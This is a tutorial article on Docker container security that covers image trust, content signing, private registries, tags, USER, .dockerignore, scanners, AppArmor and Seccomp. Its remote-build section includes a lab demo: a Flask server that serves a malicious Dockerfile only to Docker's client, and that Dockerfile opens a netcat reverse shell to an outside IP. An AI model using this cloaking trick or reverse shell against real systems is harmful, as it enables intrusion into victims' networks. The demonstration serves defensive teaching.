Docker Security – Container Security (Part 5)

19 May 2024 23 minutes Author: D2-R2

This is the fifth and final part of the Docker security article. In this installment, we’ll focus on securing Docker containers, looking at best practices and tools to protect your containers from vulnerabilities and attacks. Learn how to effectively use existing security tools to keep your containerized applications stable and secure.

Container security

Now it’s time to discuss some basic, but also complex, issues related to container security and configuration. Let’s start with something really basic.

Choosing the right image

Using official or trusted Docker images is critical to keeping your applications and data secure. Official images are checked for quality and security, which minimizes the risk of malware content or security vulnerabilities. Reputable companies regularly update their images to fix known bugs and security gaps. As a result, systems are protected from the latest threats.

Unlike trusted images, unverified Docker images can contain dangerous or malicious software. There is no guarantee that they have been properly tested and approved for safety. By using such images, users expose their systems to various types of attacks, including ransomware attacks that can encrypt data and demand a ransom to decrypt it, as well as man-in-the-middle attacks that involve intercepting and manipulating communications between two parties.

How to check if an image is “official”? When using DockerHub, we get graphical information about whether the selected image is official, that is, published and verified by the Docker team.
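
If we prefer the console, Docker Hub can also be queried from the CLI. A minimal sketch using the search command and its official-image filter:

docker search --filter is-official=true ubuntu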

Figure 78. Docker Official Image icon in Docker Hub.

Why is choosing a protected image so important? There have been, and no doubt will be, situations where Docker images have been used as a distribution channel for malware. Examples of such situations can be found at the links below:

In short, what did these malicious images contain? Among other things, cryptocurrency miners and software that steals credentials, for example from environment variables. Other examples include using a container launched from a malicious image as a kind of Trojan horse, allowing an attacker to gain unauthorized access to our internal network.

Docker Content Trust (DCT)

Docker Content Trust (DCT) is a security feature in Docker that allows you to verify the integrity and provenance of Docker images. DCT uses digital signatures to ensure that the Docker images you use have not been modified since they were created. In other words, it helps the process of verifying the authenticity and integrity of images.

By default, DCT is inactive. To enable this mechanism, we must set the DOCKER_CONTENT_TRUST environment variable to 1 in the Docker host configuration. If we want DCT to be active all the time, we should define this environment variable in files like .bashrc, .zshrc, or whatever is appropriate for the shell we are using.
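
For example, a minimal sketch of making the setting permanent, assuming a bash shell:

# Enable DCT for all future shell sessions
echo 'export DOCKER_CONTENT_TRUST=1' >> ~/.bashrc
source ~/.bashrc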

From now on, the following Docker CLI commands will use DCT:

  • push,

  • build,

  • create,

  • pull,

  • run.

What does this mean in practice? If we try to pull an image from a selected repository using the docker pull command (for example, from Docker Hub), this operation will only succeed if the selected image is signed. Let’s check it with an example (Fig. 79, Listing 50).

export DOCKER_CONTENT_TRUST=1
env | grep DOCKER
docker pull ubuntu:23.04
docker pull ubuntubase/debianbase:12

Listing 50. Checking the operation of the DCT.

Figure 79. DCT configuration.

In the first step, we download the official signed Ubuntu image with the 23.04 tag. Everything worked flawlessly. Then we chose an image from a repository that didn’t seem trustworthy and tried to download it. The Docker client returned an error telling us that it couldn’t find a signature for that particular image. This is a step in the right direction!

Of course, it’s important to remember that in some cases, not being able to download an unsigned image may be undesirable for us. But we are talking about hardening!

Of course, Docker Content Trust also works when we want to sign an image that we publish. Detailed instructions on how to set up the client so we can sign images can be found at this link.
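
As a rough sketch of what that flow looks like (the key name, registry address, and repository below are purely illustrative):

# Generate a signing key pair and register ourselves as a signer for a repository
docker trust key generate reynard
docker trust signer add --key reynard.pub reynard registry.example.com/app

# Sign (and push) a specific tag
docker trust sign registry.example.com/app:1.0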

Using your own images

Instead of relying entirely on the public Docker Hub, it’s much better to use your own image repository. Of course, we can use ready-made solutions such as Azure Container Registry or Google Artifact Registry, but we can also easily set up our own repository.

Running your own image registry for testing purposes is a matter of just a few commands. Following Docker’s documentation, we launch the registry from the official registry image (Listing 51).

docker run -d -p 5000:5000 --restart=always --name registry registry:2

Listing 51. Starting the local registry.

And that’s all. We have an image repository running, albeit in a very basic configuration, which for example does not require any form of authentication (Figure 80).

Figure 80. Launching Docker Registry.

Perfect! We now have our own registry where we can store the images we create. This way they will be isolated from, for example, Docker Hub.

The approach of using our own private storage (not necessarily hosted on our own infrastructure, but over which we have control) also has the advantage that we can constantly monitor the security of the images and respond to any identified potential threats.

WARNING! The current registry configuration provides no authentication whatsoever. Therefore, we cannot use it in a production environment. However, there are several ways to enforce authentication. More information on this topic can be found in the documentation.
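
As a sketch of one such option, the documentation describes native basic authentication based on an htpasswd file; note that the registry also expects TLS to be configured before credentials are sent over the network (the testuser/testpassword pair below is purely illustrative):

mkdir auth
docker run --entrypoint htpasswd httpd:2 -Bbn testuser testpassword > auth/htpasswd

docker run -d -p 5000:5000 --restart=always --name registry \
  -v "$(pwd)"/auth:/auth \
  -e "REGISTRY_AUTH=htpasswd" \
  -e "REGISTRY_AUTH_HTPASSWD_REALM=Registry Realm" \
  -e "REGISTRY_AUTH_HTPASSWD_PATH=/auth/htpasswd" \
  registry:2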

Docker build and URL

You should avoid builds that assume the Dockerfile is pulled from a remote resource over which you have no control. For example, the image creation process can be started with the command from Listing 52.

docker build http://random-server/Dockerfile

Listing 52. Example of running docker build from a URL.

Unfortunately, whoever controls such a server can serve us a malicious Dockerfile, even if everything looks fine. Let’s check it with an example: a simple Python program using the Flask framework (Listing 53).

from flask import Flask, request
app = Flask(__name__)

@app.route('/Dockerfile', methods=['GET'])
def headers():
    headers = request.headers
    if "Go-http-client" in headers['User-Agent']:
      response = open('EvilDockerfile').read()
    else:
      response = open('Dockerfile').read()
    return response

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=5001)

Listing 53. An example program based on Python3 and Flask.

Its task is very simple. If we make a request to the /Dockerfile endpoint, for example using a standard browser such as Chrome or Firefox (or even the curl command), the program will return the contents of the Dockerfile located on the server’s disk. However, if the User-Agent header of the request contains the string Go-http-client, the contents of a different file, namely EvilDockerfile, will be returned. Let’s see how these files differ (Listing 54, Listing 55).

FROM ubuntu:22.04
RUN useradd -r testuser
USER testuser

Listing 54. Dockerfile.

FROM ubuntu:22.04
RUN apt-get update && apt-get install -y netcat-traditional
CMD ["/usr/bin/nc.traditional", "172.16.169.186", "4444", "-e", "/bin/sh"

Listing 55. EvilDockerfile.

The first Dockerfile seems harmless. The second, however, contains instructions that create what is known as a reverse shell. Anyone who builds an image from the EvilDockerfile and then runs a container from it allows an attacker to gain access to that container. This, in turn, means access to the internal network, from which the attacker can continue their activities.

Now let’s try running the app and see how it works in practice. If you haven’t installed Flask before, you can do so by running apt install python3-flask. Also, on the server with the address 172.16.169.186, in a third console, we log in and run netcat in listening mode (nc -nlvp 4444), waiting for the callback connection from the malicious container.

In one console we will run the application (using the python3 app.py command) and in the other we will try to download the file from the endpoint provided by the application (using the curl http://172.16.169.183:5001/Dockerfile command).

Figure 81. Dockerfile download

As you can see, the first attempt to download the Dockerfile returns a “harmless” version. We can achieve the same effect by visiting the specified address from any web browser. Now let’s try to send a request to the endpoint with a User-Agent header value identical to the one used by the docker build tool (Figure 82).
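
Such a request can be reproduced with curl by spoofing the User-Agent header. The exact string is an assumption on our part: Go’s HTTP client, which docker build uses, identifies itself as Go-http-client/1.1, which is enough to match the check in our Flask app:

curl -A "Go-http-client/1.1" http://172.16.169.183:5001/Dockerfile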

Figure 82. Downloading a malicious version of the Dockerfile.

Our app seems to be working correctly. It’s time for the final test. Let’s run docker build (Figure 83).
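
For reference, a build from a URL can be started as follows (the evil-test tag name is illustrative):

docker build -t evil-test http://172.16.169.183:5001/Dockerfile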

Figure 83. Starting the Docker build.

Once the process is complete, we can try to run the container based on the created image (Figure 84).
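
Assuming the image was tagged evil-test as in the sketch above, a single command is enough; at this point the CMD from the EvilDockerfile executes and connects back to our listener:

docker run --rm evil-test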

Figure 84. Launching the malicious container and establishing a reverse shell session.

Boom! As soon as we launched the container, the reverse connection to our server was established! We now have control over the container.

The example presented here involves an internal network. However, nothing prevents an attacker from using the address of any machine on the Internet (with a public IP address) as the server to which the reverse shell connection is established.

The latest tag

All images in a Docker environment must have a tag. If we don’t specify which tag we want to use, Docker will default to the latest tag. However, this practice can have consequences, especially from a security perspective. It is worth checking in practice how this tag works and what it really means. To do this, we will use the image registry that we created a moment ago.

A common mistake that results from misunderstanding the latest tag is to assume (from its name) that latest indicates the latest version of the software. For example, in an Ubuntu repository containing 23.04 and 22.04 images, the latest is often assumed to point to the former. That may be true, but it doesn’t have to be. Under certain conditions, it can be different.

We will run an experiment that involves adding two Docker images to the repository, namely ubuntu:23.04 and ubuntu:22.04. These images are already on the disk (Fig. 85).

Figure 85. Images stored on the local disk.

Time for the actual exercise (Listing 56).

docker tag ubuntu:23.04 localhost:5000/ubuntu:23.04
docker push localhost:5000/ubuntu:23.04

docker tag ubuntu:22.04 localhost:5000/ubuntu:22.04
docker push localhost:5000/ubuntu:22.04

docker tag ubuntu:22.04 localhost:5000/ubuntu:latest
docker push localhost:5000/ubuntu:latest

Listing 56. Tagging local images and sending them to local storage.

Figure 86. Tagging and sending images to the registry.
Figure 87. Tagging and sending images to the registry.

Let’s now try to download the image from our local registry.
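
Since we don’t pass any tag, Docker will implicitly request latest. A minimal check (the /etc/lsb-release path applies to Ubuntu-based images):

docker pull localhost:5000/ubuntu

# Verify which Ubuntu version the "latest" tag actually points to
docker run --rm localhost:5000/ubuntu cat /etc/lsb-release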

Figure 88. Pulling the “latest” image from the registry.

As you can see (Figure 88), the downloaded image (the last position in the highlighted box) is version 22.04, not the “latest” version available in the repository, which is 23.04.

Remember that latest is another tag. This may indicate the latest version of the software, but it doesn’t have to. The final decision on this matter is entirely up to the person adding the image to the repository.

In summary, avoiding the latest tag in Docker helps improve the stability, consistency, and security of containerized applications. It is always recommended to use explicit tags so that you can be sure which version of an image is used in a particular environment.

The latest Docker tag refers to the most recent image added to the repository, not necessarily the latest version of the software. This means that if someone pushes an older version of software to a Docker repository and tags it as latest, users who download images with the latest tag will get that older version instead of the latest version of the software.

Avoid using the latest tag.

USER command

By default, operations defined in the Dockerfile are executed as root (with root permissions). Using the USER directive in the Dockerfile allows you to change this behavior by limiting the privileges of processes running in the container, which is beneficial from a security perspective. For example, if you have an application that does not require root privileges to function properly, you can use the USER statement to change the user to a less privileged one. This practice can help protect the system from potential attacks.

Let’s try to create our own example a Dockerfile in which we will use the USER directive (Listing 57).

FROM ubuntu:22.04
RUN useradd -r testuser
USER testuser

Listing 57. An example of a Docker file using the USER statement.

WARNING! It is not recommended to specify the UID explicitly (e.g., with the -u 1001 switch). This can cause problems with the container and the applications running in it, especially when the image is run on a platform such as OpenShift.

Running the image requires several commands (Listing 58, Figure 89).

# Commands to be executed in the context of the Docker Host
docker build -t ubuntu-testuser .
docker run -it --rm ubuntu-testuser bash

# Commands to be executed in the context of container
id
head -n 1 /etc/shadow

Listing 58. Starting a new container.

Figure 89. Starting the container from the created image.

All is well. By default, we are working as testuser, which has limited permissions! This is definitely a practice worth remembering.

Forced UID

Unfortunately, the solution described above can be easily bypassed. You just need to add the -u 0 option when starting the container, which will allow us to go back to running as root (Listing 59, Figure 90).

docker run -it --rm -u 0 ubuntu-testuser bash

Listing 59. Starting a container with the -u 0 option.

Figure 90. Access to the container with the privileges of the root user.

This issue will be revisited in the part of the article dedicated to AppArmor.

.dockerignore

We have already built our own images several times, so at this point it’s worth discussing a practice often seen in guides to “dockerization” (containerization) of applications. Such guides usually cover standard instructions such as FROM, WORKDIR, or the previously introduced USER. However, at a certain stage, a method of transferring the application files into the image is presented. In many cases, it takes the form shown in Listing 60.

COPY . .

Listing 60. Example of the COPY command.

The COPY . . command copies all files and directories from the directory where the Dockerfile is located into the image. The first argument (.) means “all files and directories in the current directory”, and the second argument (.) means “the working directory in the Docker image”. It is important to pay attention to the phrase “all files and directories”: it means literally all of them. Even files that shouldn’t end up in the image, such as .cache or node_modules, or files that shouldn’t be there because of their content, are copied as well. For example, these may be files containing credentials or other sensitive data. How can we solve this problem?

The .dockerignore file is used to exclude files and directories from the Docker image creation process. A .dockerignore file works similarly to a .gitignore file in the Git version control system. It allows you to specify templates that will be excluded from the image being built.

A sample .dockerignore file might look like Listing 61.

# ignore node_modules folder
node_modules/

# ignore test folder
/test

# ignore files .gitignore and .env
.gitignore
.env

# ignore all markdown files
*.md

Listing 61. Sample .dockerignore.

We need to place it in the same directory as our Dockerfile.
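
If we want to verify what actually ends up in the build context, one simple trick is to copy the entire context into a throwaway image and list it (Dockerfile.ctx and ctx-test are illustrative names):

# Build an image containing a copy of the whole build context
printf 'FROM ubuntu:22.04\nCOPY . /ctx\n' > Dockerfile.ctx
docker build -f Dockerfile.ctx -t ctx-test .

# Anything excluded by .dockerignore will be missing from this listing
docker run --rm ctx-test ls -la /ctx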

Automatic image scanning

In the previous part of this series, we got acquainted with tools such as Lynis and Docker Bench for Security, which allowed us to automate checking the security level of the Docker Host and the Docker Daemon. However, when it comes to Docker security, we can’t forget about the security of the images themselves. Fortunately, there are ready-made tools in this area too, which let us automate the process of vulnerability analysis. One of them is Trivy.

Trivy

Trivy is a tool that can automatically scan the following resources for security vulnerabilities:

  • container images,

  • file systems,

  • Git repositories,

  • virtual machine images,

  • Kubernetes clusters,

  • AWS environments.

We can download and run Trivy as a container (Listing 62).

docker pull aquasec/trivy:0.45.1

Listing 62. Loading a Trivy image.

To run a scan of the selected image, in this case ubuntu:22.04, enter the following command from Listing 63 (Figure 91):

docker run -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy:0.45.1 image ubuntu:22.04

Listing 63. Running a Trivy scan.

Figure 91. Starting a scan with Trivy.

After a few seconds, Trivy returns the result in the form of a table with a list of detected anomalies (Figure 92).

Figure 92. Trivy scan result – a table with a list of vulnerabilities.

For our ubuntu:22.04 test image, we identified two high-risk vulnerabilities, six medium-risk vulnerabilities, and fifteen issues classified as low-risk threats.

Each vulnerability is accompanied by a link, such as https://avd.aquasec.com/nvd/cve-2022-3715, where details about the vulnerability can be found. Importantly, mitigation recommendations are also provided.
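
Trivy also fits nicely into CI pipelines. A sketch based on the same containerized setup as above: --severity narrows the report, and --exit-code 1 makes the scan fail the build when matching vulnerabilities are found:

docker run -v /var/run/docker.sock:/var/run/docker.sock \
  aquasec/trivy:0.45.1 image --severity HIGH,CRITICAL --exit-code 1 ubuntu:22.04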

Docker Scout

The Docker Scout tool is definitely worth considering as well. This advanced tool can scan images and provide recommendations on actions to take to eliminate selected threats.

Docker Scout can be operated from the console, but it also has a user-friendly graphical interface, available in Docker Desktop: go to the Images tab, select the image we are interested in, and finally click the Vulnerabilities tab.

For example, we downloaded an older version of the Ubuntu image using the command docker pull ubuntu:groovy-20200609. After a few seconds, Scout listed the vulnerabilities found in this image (Figure 93).

Figure 93. Docker Scout results.

A similar effect can be achieved by issuing the docker scout cves ubuntu:groovy-20200609 command from the console (Figure 94).

Figure 94. Launching Docker Scout from the console.

Other tools that we recommend for your attention:

  • clair – https://github.com/quay/clair

  • InSpec – https://docs.chef.io/inspec/

  • notary – https://github.com/notaryproject/notary

  • snyk – https://snyk.io/partners/docker/

Remember that you should not completely rely on automatic solutions. Manual security checks can also produce interesting results. It is especially important to note that there are ways to “hide” from scanners.

AppArmor

AppArmor (Application Armor) is a security tool used to restrict the capabilities of applications and processes. This helps prevent attacks and successful attempts to exploit vulnerabilities. AppArmor allows the operating system to restrict the actions of a particular application – what it can do, what resources it can use, and what files or directories it can read or write to.

AppArmor is often used to strengthen the security of Docker containers. When a container is launched, it can be assigned an AppArmor profile. This profile defines a set of rules and restrictions that determine which operations are allowed and which are not allowed for processes running in the container.

AppArmor is an example of a mandatory access control (MAC) mechanism on a Linux system. Although Linux typically relies on a discretionary access control (DAC) model, tools like AppArmor allow you to enforce additional, more detailed, and strict security rules that cannot be changed by normal users. SELinux is another example of a mechanism based on the MAC concept.

You may not have even heard of AppArmor before, but Docker uses its default policy out of the box: when a container is started, the docker-default profile is loaded.
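
A quick way to confirm this on an AppArmor-enabled host (e.g., Ubuntu) is to read the profile assigned to the container’s main process:

docker run --rm ubuntu:22.04 cat /proc/1/attr/current
# expected output: docker-default (enforce)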

We’ll try to prepare and then modify an example AppArmor policy based on the example provided by Docker for the nginx server (Listing 64). An example can be found here.

#include <tunables/global>


profile docker-nginx flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>

  network inet tcp,
  network inet udp,
  network inet icmp,

  deny network raw,

  deny network packet,

  file,
  umount,

  deny /bin/** wl,
  deny /boot/** wl,
  deny /dev/** wl,
  deny /etc/** wl,
  deny /home/** wl,
  deny /lib/** wl,
  deny /lib64/** wl,
  deny /media/** wl,
  deny /mnt/** wl,
  deny /opt/** wl,
  deny /proc/** wl,
  deny /root/** wl,
  deny /sbin/** wl,
  deny /srv/** wl,
  deny /tmp/** wl,
  deny /sys/** wl,
  deny /usr/** wl,

  audit /** w,

  /var/run/nginx.pid w,

  /usr/sbin/nginx ix,

  deny /bin/dash mrwklx,
  deny /bin/sh mrwklx,
  deny /usr/bin/top mrwklx,


  capability chown,
  capability dac_override,
  capability setuid,
  capability setgid,
  capability net_bind_service,

  deny @{PROC}/* w,   # deny write for all files directly in /proc (not in a subdir)
  # deny write to files not in /proc/<number>/** or /proc/sys/**
  deny @{PROC}/{[^1-9],[^1-9][^0-9],[^1-9s][^0-9y][^0-9s],[^1-9][^0-9][^0-9][^0-9]*}/** w,
  deny @{PROC}/sys/[^k]** w,  # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel)
  deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w,  # deny everything except shm* in /proc/sys/kernel/
  deny @{PROC}/sysrq-trigger rwklx,
  deny @{PROC}/mem rwklx,
  deny @{PROC}/kmem rwklx,
  deny @{PROC}/kcore rwklx,

  deny mount,

  deny /sys/[^f]*/** wklx,
  deny /sys/f[^s]*/** wklx,
  deny /sys/fs/[^c]*/** wklx,
  deny /sys/fs/c[^g]*/** wklx,
  deny /sys/fs/cg[^r]*/** wklx,
  deny /sys/firmware/** rwklx,
  deny /sys/kernel/security/** rwklx,
}

Listing 64. An example of an AppArmor policy.

What is going on here? AppArmor’s policy is as follows:

  1. Allows the docker-nginx container to establish network connections using the TCP, UDP, and ICMP protocols.

  2. Prevents network connections through a raw socket.

  3. Grants the container broad access to files (the file rule), with the exceptions listed below.

  4. Denies access to many system directories, including /bin, /boot, /dev, etc., to prevent unauthorized access or modification.

  5. Audits (logs) every write attempt anywhere in the file system (audit /** w,).

  6. Allows writing to /var/run/nginx.pid.

  7. Allows /usr/sbin/nginx to execute.

  8. Blocks the ability to execute and modify /bin/dash, /bin/sh, and /usr/bin/top.

  9. Grants selected permissions to the container, such as chown, dac_override, setuid, setgid, and net_bind_service.

  10. Prevents writing to the /proc directory except for certain paths.

  11. Prevents mounting of file systems inside the container.

  12. Restricts access to directories in /sys, increasing system security against unauthorized access and modification.

Let’s see how it works in practice.

We store the policy in a file like /etc/apparmor.d/containers/docker-nginx. Then we run the program that loads the specified policy, that is, we execute the command: sudo apparmor_parser -r -W /etc/apparmor.d/containers/docker-nginx. All that’s left is to start the container (Listing 65).

docker run --security-opt "apparmor=docker-nginx" -p 80:80 -d --name apparmor-nginx nginx

Listing 65. Starting a container using an AppArmor profile.

Figure 95. Testing the operation of AppArmor.

Despite the enforced policy, nginx seems to work correctly. Now let’s make a modification that will prevent the nginx process from working with data from the /usr/share/nginx/ directory. This is the resource from which nginx serves files. We do this by adding the line from Listing 66 (Figure 96) to the file.

deny /usr/share/nginx/** rwklx,

Listing 66. The line to be added to the AppArmor policy.

Figure 96. Changing the AppArmor policy.

Time to restart the Docker container (Listing 67).

docker stop apparmor-nginx
docker rm apparmor-nginx
sudo apparmor_parser -r -W /etc/apparmor.d/containers/docker-nginx
docker run --security-opt "apparmor=docker-nginx" -p 80:80 -d --name apparmor-nginx nginx
curl http://127.0.0.1/

Listing 67. Starting a container with a changed policy.

Figure 97. Effect of AppArmor policy change.

We immediately see the difference (Fig. 97). Without making any changes to the container configuration or the Nginx server running on it, we blocked access to the /usr/share/nginx directory. Instead of displaying the contents of the index.html file, Nginx returns an access denied message. Everything is going according to plan!

It’s also worth paying special attention to situations where someone has disabled the AppArmor policy on a container using a construct like --security-opt apparmor=unconfined.

Seccomp

Seccomp, also known as Secure Computing Mode, is a tool that allows you to limit the set of system calls that a process can use. This is important from the point of view of security, as it significantly reduces the attack surface of the system. By filtering system calls and restricting access to them, Seccomp can effectively minimize the potential risks associated with exploiting security vulnerabilities in applications and operating systems.

In the context of Docker, Seccomp can be used to improve container security. By default, Docker includes a Seccomp profile that blocks several dozen of the more than 300 available system calls, thus strengthening the security of the host and containers. Users also have the ability to customize Seccomp profiles to suit their needs, allowing them to precisely control the availability of individual syscalls for specific containers. As a result, the complexity and flexibility of security controls increases, which allows you to achieve a balance between protection and application performance.

An example Seccomp policy can be downloaded from the GitHub repository. By modifying it as shown in Listing 68, we can block the ability to create new directories in a container that has this policy applied to it.

213d212
<        "mkdir",
826a826,832
>    },
>    {
>      "names": [
>        "mkdir"
>      ],
>      "action": "SCMP_ACT_ERRNO",
>      "errnoRet": 1337
829c835
< }
\ No newline at end of file
---
> }

Listing 68. The result of executing the “diff” command for the original and modified files.

After making changes to the reynard.json file, we can run the container (Figure 98, Listing 69).

wget -q https://github.com/moby/moby/raw/master/profiles/seccomp/default.json
cp default.json reynard.json
docker run -it --security-opt seccomp=reynard.json --rm ubuntu:22.04 bash

Listing 69. Starting the container with the new seccomp policy.

Figure 98. Changing the default Seccomp policy.
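
A quick check that the policy took effect, assuming the reynard.json modification from Listing 68: inside the container, mkdir should fail, and the custom errnoRet value surfaces in the error message:

# Executed inside the container started in Listing 69
mkdir /tmp/blocked
# expected: mkdir: cannot create directory '/tmp/blocked': Unknown error 1337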

Similar to AppArmor, Docker uses the built-in Seccomp profile by default.

SELinux

In this text, we will not discuss the configuration of the SELinux mechanism, since we discussed AppArmor earlier. In theory, SELinux and AppArmor can be installed on the same system, but this is generally not recommended due to possible management complications. Typically, Linux operating systems and distributions ship with one of these security mechanisms enabled by default and the other either disabled or not installed at all.

The final piece of the puzzle: application security

Of course, this issue is beyond the scope of this article, but cybersecurity is a system of communicating vessels: the security of a container also depends on the security of the application running inside it.

Docker Desktop Security

Docker Desktop is an application for Windows and Mac operating systems. It allows users to easily manage Docker containers, including through a graphical user interface (GUI). It is a practical tool that contains all the necessary functions for building, testing and deploying containerized applications on the local computer. This is an ideal solution for those who prefer to avoid prolonged work in the console.

Docker Desktop serves as an alternative interface between the user and the Docker Daemon. Therefore, all recommendations here also apply to environments (such as development environments) that use Docker Desktop instead of Docker CLI. It is also worth emphasizing the need to regularly update Docker Desktop to the latest available version to ensure optimal performance and security.

Software updates

For the sake of completeness, we will also emphasize the need to update the Docker software regularly. This may seem obvious, but regular updates protect us from vulnerabilities that have already been discovered and fixed.
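
For example, a minimal update routine, assuming Docker was installed from Docker’s official apt repository (package names may differ for other installation methods):

# Check the currently running version
docker version --format 'client: {{.Client.Version}}, server: {{.Server.Version}}'

# Upgrade the Docker packages
sudo apt-get update && sudo apt-get install --only-upgrade \
  docker-ce docker-ce-cli containerd.io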
